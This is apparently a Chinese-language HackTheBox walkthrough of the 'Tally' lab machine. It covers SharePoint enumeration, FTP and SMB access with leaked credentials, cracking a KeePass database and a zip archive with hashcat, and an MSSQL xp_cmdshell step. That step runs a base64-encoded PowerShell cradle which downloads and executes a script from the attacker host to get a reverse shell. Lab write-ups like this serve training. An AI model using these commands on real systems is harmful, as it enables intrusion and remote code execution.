Tally - HackTheBox
Td

image

nmap扫描

image

image

先看80

image

右上角有个登录

image

猜不出密码

扫一下目录

image

没有扫到可利用信息,而且访问这些asp文件都是同一个错误界面

image

扫描的结果告知了cms是Microsoft sharepoint

image

DNS解析域名为tally,添加hosts文件

搜一下

https://sharepointstuff.com/2021/03/30/useful-sharepoint-urls/

image

这里有一大堆url路径,尝试访问

image

在这个路径下发现了东西

image

在Documents下发现一个文件,看名字应该是ftp有关的

image

ftp的密码,还差个用户名

image

在Site Pages下发现一个url文件

image

给出了ftp的用户名

wget -m ftp://ftp_user:'UTDRSCH53c"$6hys'@10.10.10.59

把所有ftp上的文件都下载下来

kpcli --kdb tim.kdbx

image

需要密码,爆破一下

keepass2john tim.kdbx > hash

image

image

到hashcat看一下类型

image

hashcat -m 13400 hash /usr/share/wordlists/rockyou.txt

image

要把前面的tim:去掉

image

打开后发现一个Shares的表

image

应该是445端口的账号密码

image

smbclient //10.10.10.59/ACCT -U Finance%Acc0unting

在目录下发现一个文件

image

image

里面是数据库的账号密码

尝试连接一下

sqsh -S 10.10.10.59 -U sa

image

密码不对

image

在该目录下发现一个压缩包

image

继续爆破

image

image

还是一样,把前面:的都删了

hashcat -m 17220 hash /usr/share/wordlists/rockyou.txt

image

image

有一个账号密码admin:Finance2

image

在该目录下发现一个tester.exe,下载下来看看是什么

用strings查看exe文件

strings tester.exe

image

翻到一半发现了数据库配置信息

image

连接数据库

image

既然是sql server数据库,就尝试用shell_exec提权

image

image

成功开启

反弹个shell

image

这边找到了FTP的目录,可以通过FTP上传一个反弹shell,然后在这执行,找到一个可读写目录上传

image

echo 'iex(new-object system.net.webclient).downloadstring("http://10.10.14.12/test.ps1")'|iconv -t utf-16le|base64 -w0

xp_cmdshell 'powershell -enc aQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAyAC8AdABlAHMAdAAuAHAAcwAxACIAKQAKAA=='

image

image

提权

image

windows2016 64位

image

打了两个补丁

image

权限足够,使用打印机欺骗

image

image

image